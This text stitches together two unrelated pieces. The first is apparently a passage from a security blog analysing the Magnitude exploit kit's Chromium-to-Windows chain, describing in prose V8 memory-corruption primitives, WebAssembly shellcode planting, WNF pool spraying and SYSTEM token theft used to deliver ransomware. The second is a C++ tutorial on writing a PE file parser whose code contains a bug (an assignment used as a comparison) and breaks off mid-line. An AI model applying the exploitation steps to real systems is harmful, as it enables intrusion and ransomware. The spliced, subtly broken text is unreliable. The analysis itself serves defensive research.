Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution.
Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.
With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.
Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.
The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.
The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.
Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.
There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.
CVE-2021-31956
Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a two–part blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.
The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.
The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.
Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.
When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10 000 extra _WNF_STATE_DATA structures in a row and frees each other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size.
With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query its ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit just simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.
After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.
The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.
What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.
Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.
The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread.
With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.
As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.
With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.
Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.
Final Thoughts
If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.
As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.
Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least twocases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.
A dive into the PE file format - LAB 1: Writing a PE Parser
Introduction
In the previous posts we’ve discussed the basic structure of PE files, In this post we’re going to apply this knowledge into building a PE file parser in c++ as a proof of concept.
The parser we’re going to build will not be a full parser and is not intended to be used as a reliable tool, this is only an exercise to better understand the PE file structure.
We’re going to focus on PE32 and PE32+ files, and we’ll only parse the following parts of the file:
DOS Header
Rich Header
NT Headers
Data Directories (within the Optional Header)
Section Headers
Import Table
Base Relocations Table
The code of this project can be found on my github profile.
Initial Setup
Process Outline
We want out parser to follow the following process:
Read a file.
Validate that it’s a PE file.
Determine whether it’s a PE32 or a PE32+.
Parse out the following structures:
DOS Header
Rich Header
NT Headers
Section Headers
Import Data Directory
Base Relocation Data Directory
Print out the following information:
File name and type.
DOS Header:
Magic value.
Address of new exe header.
Each entry of the Rich Header, decrypted and decoded.
NT Headers - PE file signature.
NT Headers - File Header:
Machine value.
Number of sections.
Size of Optional Header.
NT Headers - Optional Header:
Magic value.
Size of code section.
Size of initialized data.
Size of uninitialized data.
Address of entry point.
RVA of start of code section.
Desired Image Base.
Section alignment.
File alignment.
Size of image.
Size of headers.
For each Data Directory: its name, RVA and size.
For each Section Header:
Section name.
Section virtual address and size.
Section raw data pointer and size.
Section characteristics value.
Import Table:
For each DLL:
DLL name.
ILT and IAT RVAs.
Whether its a bound import or not.
for every imported function:
Ordinal if ordinal/name flag is 1.
Name, hint and Hint/Name table RVA if ordinal/name flag is 0.
Base Relocation Table:
For each block:
Page RVA.
Block size.
Number of entries.
For each entry:
Raw value.
Relocation offset.
Relocation Type.
winnt.h Definitions
We will need the following definitions from the winnt.h header:
Types:
BYTE
WORD
DWORD
QWORD
LONG
LONGLONG
ULONGLONG
Constants:
IMAGE_NT_OPTIONAL_HDR32_MAGIC
IMAGE_NT_OPTIONAL_HDR64_MAGIC
IMAGE_NUMBEROF_DIRECTORY_ENTRIES
IMAGE_DOS_SIGNATURE
IMAGE_DIRECTORY_ENTRY_EXPORT
IMAGE_DIRECTORY_ENTRY_IMPORT
IMAGE_DIRECTORY_ENTRY_RESOURCE
IMAGE_DIRECTORY_ENTRY_EXCEPTION
IMAGE_DIRECTORY_ENTRY_SECURITY
IMAGE_DIRECTORY_ENTRY_BASERELOC
IMAGE_DIRECTORY_ENTRY_DEBUG
IMAGE_DIRECTORY_ENTRY_ARCHITECTURE
IMAGE_DIRECTORY_ENTRY_GLOBALPTR
IMAGE_DIRECTORY_ENTRY_TLS
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
IMAGE_DIRECTORY_ENTRY_IAT
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
IMAGE_SIZEOF_SHORT_NAME
IMAGE_SIZEOF_SECTION_HEADER
Structures:
IMAGE_DOS_HEADER
IMAGE_DATA_DIRECTORY
IMAGE_OPTIONAL_HEADER32
IMAGE_OPTIONAL_HEADER64
IMAGE_FILE_HEADER
IMAGE_NT_HEADERS32
IMAGE_NT_HEADERS64
IMAGE_IMPORT_DESCRIPTOR
IMAGE_IMPORT_BY_NAME
IMAGE_BASE_RELOCATION
IMAGE_SECTION_HEADER
I took these definitions from winnt.h and added them to a new header called winntdef.h.
The structure will hold a 32-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.
ILT_ENTRY_64
A structure to represent a 64-bit ILT entry during processing.
The structure will hold a 64-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.
BASE_RELOC_ENTRY
A structure to represent a base relocation entry during processing.
Our parser will represent a PE file as an object type of either PE32FILE or PE64FILE.
These 2 classes only differ in some member definitions but their functionality is identical.
Throughout this post we will use the code from PE64FILE.
The only public member beside the class constructor is a function called printInfo() which will print information about the file.
The class constructor takes two parameters, a char array representing the name of the file and a file pointer to the actual data of the file.
After that comes a long series of variables definitions, these class members are going to be used internally during the parsing process and we’ll mention each one of them later.
In the end is a series of methods definitions, first two methods are called locate and resolve, I will talk about them in a minute.
The rest are functions responsible for parsing different parts of the file, and functions responsible for printing information about the same parts.
Constructor
The constructor of the class simply sets the file pointer and name variables, then it calls the ParseFile() function.
The ParseFile() function calls the other parser functions:
voidPE64FILE::ParseFile(){// PARSE DOS HEADERParseDOSHeader();// PARSE RICH HEADERParseRichHeader();//PARSE NT HEADERSParseNTHeaders();// PARSE SECTION HEADERSParseSectionHeaders();// PARSE IMPORT DIRECTORYParseImportDirectory();// PARSE BASE RELOCATIONSParseBaseReloc();}
Resolving RVAs
Most of the time, we’ll have a RVA that we’ll need to change to a file offset.
The process of resolving an RVA can be outlined as follows:
Determine which section range contains that RVA:
Iterate over all sections and for each section compare the RVA to the section virtual address and to the section virtual address added to the virtual size of the section.
If the RVA exists within this range then it belongs to that section.
Calculate the file offset:
Subtract the RVA from the section virtual address.
Add that value to the raw data pointer of the section.
An example of this is locating a Data Directory.
The IMAGE_DATA_DIRECTORY structure only gives us an RVA of the directory, to locate that directory we’ll need to resolve that address.
I wrote two functions to do this, first one to locate the virtual address (locate()), second one to resolve the address (resolve()).
locate() iterates over the PEFILE_SECTION_HEADERS array, compares the RVA as described above, then it returns the index of the appropriate section header within the PEFILE_SECTION_HEADERS array.
Please note that in order for these functions to work we’ll need to parse out the section headers and fill the PEFILE_SECTION_HEADERS array first.
We still haven’t discussed this part, but I wanted to talk about the address resolvers first.
main function
The main function of the program is fairly simple, it only does 2 things:
Create a file pointer to the given file, and validate that the file was read correctly.
Call INITPARSE() on the file, and based on the return value it decides between three actions:
Exit.
Create a PE32FILE object, call PrintInfo(), close the file pointer then exit.
Create a PE64FILE object, call PrintInfo(), close the file pointer then exit.
PrintInfo() calls the other print info functions.
intmain(intargc,char*argv[]){if(argc!=2){printf("Usage: %s [path to executable]\n",argv[0]);return1;}FILE*PpeFile;fopen_s(&PpeFile,argv[1],"rb");if(PpeFile==NULL){printf("Can't open file.\n");return1;}if(INITPARSE(PpeFile)==1){exit(1);}elseif(INITPARSE(PpeFile)==32){PE32FILEPeFile_1(argv[1],PpeFile);PeFile_1.PrintInfo();fclose(PpeFile);exit(0);}elseif(INITPARSE(PpeFile)==64){PE64FILEPeFile_1(argv[1],PpeFile);PeFile_1.PrintInfo();fclose(PpeFile);exit(0);}return0;}
INITPARSE()
INITPARSE() is a function defined in PEFILE.cpp.
Its only job is to validate that the given file is a PE file, then determine whether the file is PE32 or PE32+.
It reads the DOS header of the file and checks the DOS MZ header, if not found it returns an error.
After validating the PE file, it sets the file position to (DOS_HEADER.e_lfanew + size of DWORD (PE signature) + size of the file header) which is the exact offset of the beginning of the Optional Header.
Then it reads a WORD, we know that the first WORD of the Optional Header is a magic value that indicates the file type, it then compares that word to IMAGE_NT_OPTIONAL_HDR32_MAGIC and IMAGE_NT_OPTIONAL_HDR64_MAGIC, and based on the comparison results it either returns 32 or 64 indicating PE32 or PE32+, or it returns an error.
intINITPARSE(FILE*PpeFile){___IMAGE_DOS_HEADERTMP_DOS_HEADER;WORDPEFILE_TYPE;fseek(PpeFile,0,SEEK_SET);fread(&TMP_DOS_HEADER,sizeof(___IMAGE_DOS_HEADER),1,PpeFile);if(TMP_DOS_HEADER.e_magic!=___IMAGE_DOS_SIGNATURE){printf("Error. Not a PE file.\n");return1;}fseek(PpeFile,(TMP_DOS_HEADER.e_lfanew+sizeof(DWORD)+sizeof(___IMAGE_FILE_HEADER)),SEEK_SET);fread(&PEFILE_TYPE,sizeof(WORD),1,PpeFile);if(PEFILE_TYPE==___IMAGE_NT_OPTIONAL_HDR32_MAGIC){return32;}elseif(PEFILE_TYPE==___IMAGE_NT_OPTIONAL_HDR64_MAGIC){return64;}else{printf("Error while parsing IMAGE_OPTIONAL_HEADER.Magic. Unknown Type.\n");return1;}}
Parsing DOS Header
ParseDOSHeader()
Parsing out the DOS Header is nothing complicated, we just need to read from the beginning of the file an amount of bytes equal to the size of the DOS Header, then we can assign that data to the pre-defined class member PEFILE_DOS_HEADER.
From there we can access all of the struct members, however we’re only interested in e_magic and e_lfanew.
voidPE64FILE::PrintDOSHeaderInfo(){printf(" DOS HEADER:\n");printf(" -----------\n\n");printf(" Magic: 0x%X\n",PEFILE_DOS_HEADER_EMAGIC);printf(" File address of new exe header: 0x%X\n",PEFILE_DOS_HEADER_LFANEW);}
Parsing Rich Header
Process
To parse out the Rich Header we’ll need to go through multiple steps.
We don’t know anything about the Rich Header, we don’t know its size, we don’t know where it’s exactly located, we don’t even know if the file we’re processing contains a Rich Header in the first place.
First of all, we need to locate the Rich Header.
We don’t know the exact location, however we have everything we need to locate it.
We know that if a Rich Header exists, then it has to exist between the DOS Stub and the PE signature or the beginning of the NT Headers.
We also know that any Rich Header ends with a 32-bit value Rich followed by the XOR key.
One might rely on the fixed size of the DOS Header and the DOS Stub, however, the default DOS Stub message can be changed, so that size is not guaranteed to be fixed.
A better approach would be to read from the beginning of the file to the start of the NT Headers, then search through that buffer for the Rich sequence, if found then we’ve successfully located the end of the Rich Header, if not found then most likely the file doesn’t contain a Rich Header.
Once we’ve located the end of the Rich Header, we can read the XOR key, then go backwards starting from the Rich signature and keep XORing 4 bytes at a time until we reach the DanS signature which indicates the beginning of the Rich Header.
After obtaining the position and the size of the Rich Header, we can normally read and process the data.
ParseRichHeader()
This function starts by allocating a buffer on the heap, then it reads e_lfanew size of bytes from the beginning of the file and stores the data in the allocated buffer.
It then goes through a loop where it does a linear search byte by byte. In each iteration it compares the current byte and the byte the follows to 0x52 (R) and 0x69 (i).
When the sequence is found, it stores the index in a variable then the loop breaks.
char*dataPtr=newchar[PEFILE_DOS_HEADER_LFANEW];fseek(Ppefile,0,SEEK_SET);fread(dataPtr,PEFILE_DOS_HEADER_LFANEW,1,Ppefile);intindex_=0;for(inti=0;i<=PEFILE_DOS_HEADER_LFANEW;i++){if(dataPtr[i]==0x52&&dataPtr[i+1]==0x69){index_=i;break;}}if(index_==0){printf("Error while parsing Rich Header.");PEFILE_RICH_HEADER_INFO.entries=0;return;}
After that it reads the XOR key, then goes into the decryption loop where in each iteration it increments RichHeaderSize by 4 until it reaches the DanS sequence.
After obtaining the size and the position, it allocates a new buffer for the Rich Header, reads and decrypts the Rich Header, updates PEFILE_RICH_HEADER_INFO with the appropriate data pointer, size and number of entries, then finally it deallocates the buffer it was using for processing.
voidPE64FILE::ParseRichHeader(){char*dataPtr=newchar[PEFILE_DOS_HEADER_LFANEW];fseek(Ppefile,0,SEEK_SET);fread(dataPtr,PEFILE_DOS_HEADER_LFANEW,1,Ppefile);intindex_=0;for(inti=0;i<=PEFILE_DOS_HEADER_LFANEW;i++){if(dataPtr[i]==0x52&&dataPtr[i+1]==0x69){index_=i;break;}}if(index_==0){printf("Error while parsing Rich Header.");PEFILE_RICH_HEADER_INFO.entries=0;return;}charkey[4];memcpy(key,dataPtr+(index_+4),4);intindexpointer=index_-4;intRichHeaderSize=0;while(true){chartmpchar[4];memcpy(tmpchar,dataPtr+indexpointer,4);for(inti=0;i<4;i++){tmpchar[i]=tmpchar[i]^key[i];}indexpointer-=4;RichHeaderSize+=4;if(tmpchar[1]=0x61&&tmpchar[0]==0x44){break;}}char*RichHeaderPtr=newchar[RichHeaderSize];memcpy(RichHeaderPtr,dataPtr+(index_-RichHeaderSize),RichHeaderSize);for(inti=0;i<RichHeaderSize;i+=4){for(intx=0;x<4;x++){RichHeaderPtr[i+x]=RichHeaderPtr[i+x]^key[x];}}PEFILE_RICH_HEADER_INFO.size=RichHeaderSize;PEFILE_RICH_HEADER_INFO.ptrToBuffer=RichHeaderPtr;PEFILE_RICH_HEADER_INFO.entries=(RichHeaderSize-16)/8;delete[]dataPtr;PEFILE_RICH_HEADER.entries=newRICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];for(inti=16;i<RichHeaderSize;i+=8){WORDPRODID=(uint16_t)((unsignedchar)RichHeaderPtr[i+3]<<8)|(unsignedchar)RichHeaderPtr[i+2];WORDBUILDID=(uint16_t)((unsignedchar)RichHeaderPtr[i+1]<<8)|(unsignedchar)RichHeaderPtr[i];DWORDUSECOUNT=(uint32_t)((unsignedchar)RichHeaderPtr[i+7]<<24)|(unsignedchar)RichHeaderPtr[i+6]<<16|(unsignedchar)RichHeaderPtr[i+5]<<8|(unsignedchar)RichHeaderPtr[i+4];PEFILE_RICH_HEADER.entries[(i/8)-2]={PRODID,BUILDID,USECOUNT};if(i+8>=RichHeaderSize){PEFILE_RICH_HEADER.entries[(i/8)-1]={0x0000,0x0000,0x00000000};}}delete[]PEFILE_RICH_HEADER_INFO.ptrToBuffer;}
PrintRichHeaderInfo()
This function iterates over each entry in PEFILE_RICH_HEADER and prints its value.
Similar to the DOS Header, all we need to do is to read from e_lfanew an amount of bytes equal to the size of IMAGE_NT_HEADERS.
After that we can parse out the contents of the File Header and the Optional Header.
The Optional Header contains an array of IMAGE_DATA_DIRECTORY structures which we care about.
To parse out this information, we can use the IMAGE_DIRECTORY_[...] constants defined in winnt.h as array indexes to access the corresponding IMAGE_DATA_DIRECTORY structure of each Data Directory.
This function prints the data obtained from the File Header and the Optional Header, and for each Data Directory it prints its RVA and size.
voidPE64FILE::PrintNTHeadersInfo(){printf(" NT HEADERS:\n");printf(" -----------\n\n");printf(" PE Signature: 0x%X\n",PEFILE_NT_HEADERS_SIGNATURE);printf("\n File Header:\n\n");printf(" Machine: 0x%X\n",PEFILE_NT_HEADERS_FILE_HEADER_MACHINE);printf(" Number of sections: 0x%X\n",PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS);printf(" Size of optional header: 0x%X\n",PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER);printf("\n Optional Header:\n\n");printf(" Magic: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC);printf(" Size of code section: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE);printf(" Size of initialized data: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA);printf(" Size of uninitialized data: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA);printf(" Address of entry point: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT);printf(" RVA of start of code section: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE);printf(" Desired image base: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE);printf(" Section alignment: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT);printf(" File alignment: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT);printf(" Size of image: 0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE);printf(" Size of headers: 